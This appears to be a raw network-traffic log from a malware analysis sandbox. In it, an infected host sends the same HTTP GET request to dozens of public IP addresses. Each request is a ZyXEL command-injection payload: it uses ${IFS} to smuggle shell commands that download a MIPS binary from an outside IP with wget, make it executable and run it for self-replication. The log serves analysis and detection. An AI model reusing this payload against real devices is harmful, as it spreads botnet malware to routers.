                                                        Jan 28, 2024 10:13:07.691895962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8074192.168.2.145039264.74.69.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.691919088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8075192.168.2.14385361.16.175.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.691978931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8076192.168.2.143770440.124.61.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692008972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8077192.168.2.1437594137.125.169.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692032099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8078192.168.2.1450836211.115.124.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692065001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8079192.168.2.1433626222.144.126.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692109108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8080192.168.2.1455378144.25.149.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692136049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8081192.168.2.1454234105.191.220.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692148924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8082192.168.2.145463070.149.243.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692219019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8083192.168.2.144531695.162.21.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692240953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8084192.168.2.1437300219.203.97.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692296028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8085192.168.2.1442676223.215.188.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692327976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8086192.168.2.143296289.109.248.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692347050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8087192.168.2.1441030195.158.4.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692397118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8088192.168.2.1455622167.186.68.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692436934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8089192.168.2.1447580186.26.61.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692475080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8090192.168.2.145547636.225.176.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692522049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8091192.168.2.1436988115.129.230.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692543030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8092192.168.2.1453482102.238.10.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692585945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8093192.168.2.1458042209.203.6.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692627907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8094192.168.2.1459372222.220.182.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692658901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8095192.168.2.1460592223.107.108.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692682028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8096192.168.2.143532685.49.227.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692725897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8097192.168.2.1448516150.104.71.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692765951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8098192.168.2.1457334163.103.199.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692794085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8099192.168.2.146090880.220.86.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692845106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8100192.168.2.1455674101.195.49.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692882061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8101192.168.2.145031613.200.42.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692903996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8102192.168.2.1432844155.174.143.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692960978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8103192.168.2.145870297.215.96.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.692979097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8104192.168.2.14399721.216.253.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693034887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8105192.168.2.1447438116.73.144.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693069935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8106192.168.2.144891873.112.166.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693089962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8107192.168.2.145677078.254.90.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693145037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8108192.168.2.145528248.249.192.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693165064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8109192.168.2.144758813.151.119.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693205118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8110192.168.2.144159058.26.139.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693245888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8111192.168.2.1432830115.197.114.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693270922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8112192.168.2.144760018.239.250.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693316936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8113192.168.2.1451112181.78.55.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693373919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8114192.168.2.145607035.248.77.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693432093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8115192.168.2.1457842123.7.7.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693476915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8116192.168.2.1433186217.247.106.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693507910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8117192.168.2.1438202144.48.60.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693542004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8118192.168.2.1445608155.190.205.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693598032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8119192.168.2.145054427.130.174.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693648100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8120192.168.2.1441000118.167.33.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693686008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8121192.168.2.145765091.13.40.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693728924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8122192.168.2.14599008.42.97.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693772078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8123192.168.2.1442532104.133.153.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693809032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8124192.168.2.1460456167.157.134.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693839073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8125192.168.2.1442646143.56.41.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693872929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8126192.168.2.1458704202.62.21.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693917036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8127192.168.2.1453856177.123.81.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693943024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8128192.168.2.1433844180.205.161.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.693991899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8129192.168.2.143816253.69.167.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694015980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8130192.168.2.1452162167.203.36.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694077015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8131192.168.2.1440786106.32.148.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694114923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8132192.168.2.146052631.237.59.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694139004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8133192.168.2.1450808138.103.29.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694163084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8134192.168.2.1457602111.50.218.183443
                                                        TimestampBytes transferredDirectionData
